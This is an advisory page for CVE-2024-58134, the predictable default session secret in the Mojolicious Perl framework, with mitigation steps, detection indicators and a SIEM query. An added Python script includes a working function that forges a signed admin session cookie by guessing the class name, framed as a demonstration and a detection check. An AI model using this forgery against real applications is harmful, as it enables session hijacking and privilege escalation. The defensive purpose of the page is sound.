CVE-2024-58134
📋 TL;DR
Mojolicious signs its client-side session cookie with an HMAC keyed by the application's secrets. If an application never sets them, the framework falls back to a predictable default: the application's class name (older releases used a hard-coded string). An attacker who knows or guesses that default can compute valid signatures and so mint or modify session cookies at will, hijacking or escalating any user's session. Every Mojolicious application that relies on the default secret is affected; applications that configure their own secrets are not.
💻 Affected Systems
- Mojolicious
📦 What is this software?
Mojolicious is a real-time web framework for Perl. Its default session store keeps the whole session in a signed cookie on the client, so the integrity of sessions rests entirely on the secrecy of the HMAC key configured via the application's `secrets` attribute.
⚠️ Risk & Real-World Impact
Worst Case
Complete session hijacking allowing attackers to impersonate any user, access sensitive data, and perform unauthorized actions as authenticated users.
Likely Case
Session tampering and privilege escalation where attackers modify session data to gain unauthorized access or elevate privileges.
If Mitigated
No impact if proper custom secrets are configured and strong session management controls are implemented.
🎯 Exploit Status
Exploitation requires the secret. For an application running on the default, that is its class name, which is often guessable from the product name or exposed through error pages, stack traces, or published source. Because the signature is an HMAC over attacker-visible cookie data, a single captured cookie is also enough to brute-force candidate secrets offline; no further interaction with the server is needed until the forged cookie is presented.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: This page identifies no single patch release; the fix is configuration. Set explicit secrets in the application, and run a current Mojolicious release, which logs "Your secret passphrase needs to be changed" when the default is still in use (see the vendor FAQ below).
Vendor Advisory: https://docs.mojolicious.org/Mojolicious/Guides/FAQ#What-does-Your-secret-passphrase-needs-to-be-changed-mean
Restart Required: Yes
Instructions:
1. Update to the latest Mojolicious version. 2. Generate a long random secret (for example `openssl rand -hex 32`) and set it in the application's `secrets`; never commit it to source control. 3. Restart the application server. Note that changing the secret invalidates every existing session cookie, so all users are logged out; keeping the old default as a secondary secret to avoid this would leave the forgery path open and must not be done.
🔧 Temporary Workarounds
Configure Custom Session Secret
Set a strong, random secret in your Mojolicious application to replace the predictable default. This needs no upgrade, so it is the mitigation for every affected version. `secrets` takes a list: the first entry signs new cookies, the remaining entries are still accepted for verification, which is how secrets are rotated later without logging everyone out.
# Mojolicious::Lite app (in a full app, call $self->secrets([...]) in startup):
app->secrets(['your-strong-random-secret-here']);
🧯 If You Can't Patch
- Setting `secrets` is a configuration change, not a code upgrade, so there is rarely a real "can't patch" case; do that first.
- If the configuration truly cannot be changed, move sensitive state out of the cookie session into a server-side store keyed by an unguessable identifier, and re-check authorization on every privileged request rather than trusting session fields.
- Web application firewall rules have limited value here: a cookie forged with the real secret carries a valid signature and is indistinguishable from a legitimate one. They can at most rate-limit clients presenting many badly signed cookies, which is what an offline-cracking attacker does not need to do.
🔍 How to Verify
Check if Vulnerable:
Check whether the application ever sets `secrets` (search the code for `->secrets(` and `app->secrets(`; a Mojolicious::Lite app with no such call is vulnerable). Check the application log for the message "Your secret passphrase needs to be changed", which current releases emit at startup when the default is in use. Finally, take a session cookie issued by the running application and verify its signature with HMAC-SHA256 keyed by the application class name: if it verifies, the default secret is in use.
Check Version:
perl -MMojolicious -e 'print Mojolicious->VERSION'
Verify Fix Applied:
Verify that a strong custom secret is configured, then confirm that a cookie signed with the old default secret (the class name) is now rejected and that a freshly issued cookie no longer verifies under that default.
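The forgery described under Exploit Status and the checks above, as an added example written for this page rather than code from the Mojolicious project. It models the signed session cookie as base64-encoded JSON (with `=` padding rewritten to `-`) followed by `--` and a hex HMAC-SHA256 over that value; this layout, the application class name `MyApp`, and the helper names are assumptions, so compare them against your installed version before relying on the result.

```python
"""Model of Mojolicious signed session cookies, showing why a predictable
default secret (the application's class name) lets an attacker mint cookies
the application accepts, and how to check a captured cookie for it.

Added example, not Mojolicious project code. The cookie layout modelled
here is an assumption about the framework; verify it against your version.
"""
import base64
import hashlib
import hmac
import json
import secrets
from typing import List, Optional


def encode_session(session: dict) -> str:
    """Compact JSON, standard base64 without line breaks, '=' padding
    rewritten to '-' so the value stays cookie-safe (assumed layout)."""
    raw = json.dumps(session, separators=(",", ":")).encode()
    return base64.b64encode(raw).decode().replace("=", "-")


def decode_session(value: str) -> dict:
    """Inverse of encode_session."""
    return json.loads(base64.b64decode(value.replace("-", "=")))


def signature(value: str, secret: str) -> str:
    """Hex HMAC-SHA256 over the cookie value, keyed with one secret."""
    return hmac.new(secret.encode(), value.encode(), hashlib.sha256).hexdigest()


def sign_cookie(value: str, secret_list: List[str]) -> str:
    """Sign with the first configured secret (the one used for new cookies)."""
    return f"{value}--{signature(value, secret_list[0])}"


def verify_cookie(cookie: str, secret_list: List[str]) -> Optional[str]:
    """Return the unsigned value if any configured secret verifies the
    cookie, else None. Accepting every configured secret is what allows
    rotation: new secret first, old one kept for a while."""
    value, sep, sig = cookie.rpartition("--")
    if not sep or not sig:
        return None
    for secret in secret_list:
        if hmac.compare_digest(signature(value, secret), sig):
            return value
    return None


def forge_session_cookie(session: dict, guessed_secret: str) -> str:
    """Attacker side: mint a cookie for an arbitrary session under a guessed
    secret. Against an app on the default, the guess is its class name."""
    return sign_cookie(encode_session(session), [guessed_secret])


def cookie_signed_with(cookie: str, candidates: List[str]) -> Optional[str]:
    """Defender side: report which candidate secret (if any) verifies a
    cookie issued by the app. A hit on the class name means the default
    secret is in use."""
    for secret in candidates:
        if verify_cookie(cookie, [secret]) is not None:
            return secret
    return None


def demo() -> dict:
    """Walk through the attack and the fix; returns the observed results."""
    app_class = "MyApp"                       # assumed application class name
    default_secrets = [app_class]             # what an unconfigured app uses
    strong_secrets = [secrets.token_hex(32)]  # what it should use instead

    # Legitimate cookie issued by the unconfigured app (constructed sample).
    issued = sign_cookie(encode_session({"user": "alice"}), default_secrets)
    # Attacker forges an admin session by guessing the class name.
    forged = forge_session_cookie({"user": "admin"}, app_class)

    return {
        "default_detected": cookie_signed_with(issued, ["Mojolicious", app_class]),
        "forged_accepted_before_fix": verify_cookie(forged, default_secrets) is not None,
        "forged_accepted_after_fix": verify_cookie(forged, strong_secrets) is not None,
        # Old sessions are rejected too: the expected "everyone logs in again".
        "old_session_accepted_after_fix": verify_cookie(issued, strong_secrets) is not None,
        "forged_session": decode_session(verify_cookie(forged, default_secrets)),
    }


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

`cookie_signed_with` is the practical check: feed it the `mojolicious` cookie from a real response and a short list of candidates (the application class name, `Mojolicious`, any known old hard-coded default). A match means the application is still on a predictable secret regardless of what the configuration files appear to say.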
📡 Detection & Monitoring
Log Indicators:
- The startup message "Your secret passphrase needs to be changed" (current releases log it when the default secret is in use); treat it as a finding, not noise.
- Bursts of rejected session cookies, which Mojolicious logs as a "bad signature" message for the cookie (at debug or trace level depending on version), from one client or against one account.
- Session contents that change in ways the application never writes, for example a user or role field jumping to a privileged value without a corresponding login.
Network Indicators:
- Many requests from one client carrying differently signed cookies for the same session value (online guessing of the secret).
- Requests presenting a cookie the server never issued, visible only if you correlate issued cookies or session fields with later use.
Caveat: a cookie forged with the correct secret carries a valid signature and produces no validation failure at all, so the indicators above catch guessing attempts, not a successful forgery. Identity-level checks (privileged actions by accounts that never logged in, sessions used from an unexpected network) are needed for that.
SIEM Query:
source="web_logs" AND (message="bad signature" OR message="Your secret passphrase needs to be changed") | stats count by src_ip, cookie_name | where count > threshold
🔗 References
- https://docs.mojolicious.org/Mojolicious/Guides/FAQ#What-does-Your-secret-passphrase-needs-to-be-changed-mean
- https://github.com/hashcat/hashcat/pull/4090
- https://github.com/mojolicious/mojo/pull/1791
- https://github.com/mojolicious/mojo/pull/2200
- https://github.com/mojolicious/mojo/pull/2252
- https://lists.debian.org/debian-perl/2025/05/msg00016.html
- https://lists.debian.org/debian-perl/2025/05/msg00017.html
- https://lists.debian.org/debian-perl/2025/05/msg00018.html
- https://medium.com/securing/baking-mojolicious-cookies-revisited-a-case-study-of-solving-security-problems-through-security-by-13da7c225802
- https://metacpan.org/release/SRI/Mojolicious-9.39/source/lib/Mojolicious.pm#L51
- https://www.synacktiv.com/publications/baking-mojolicious-cookies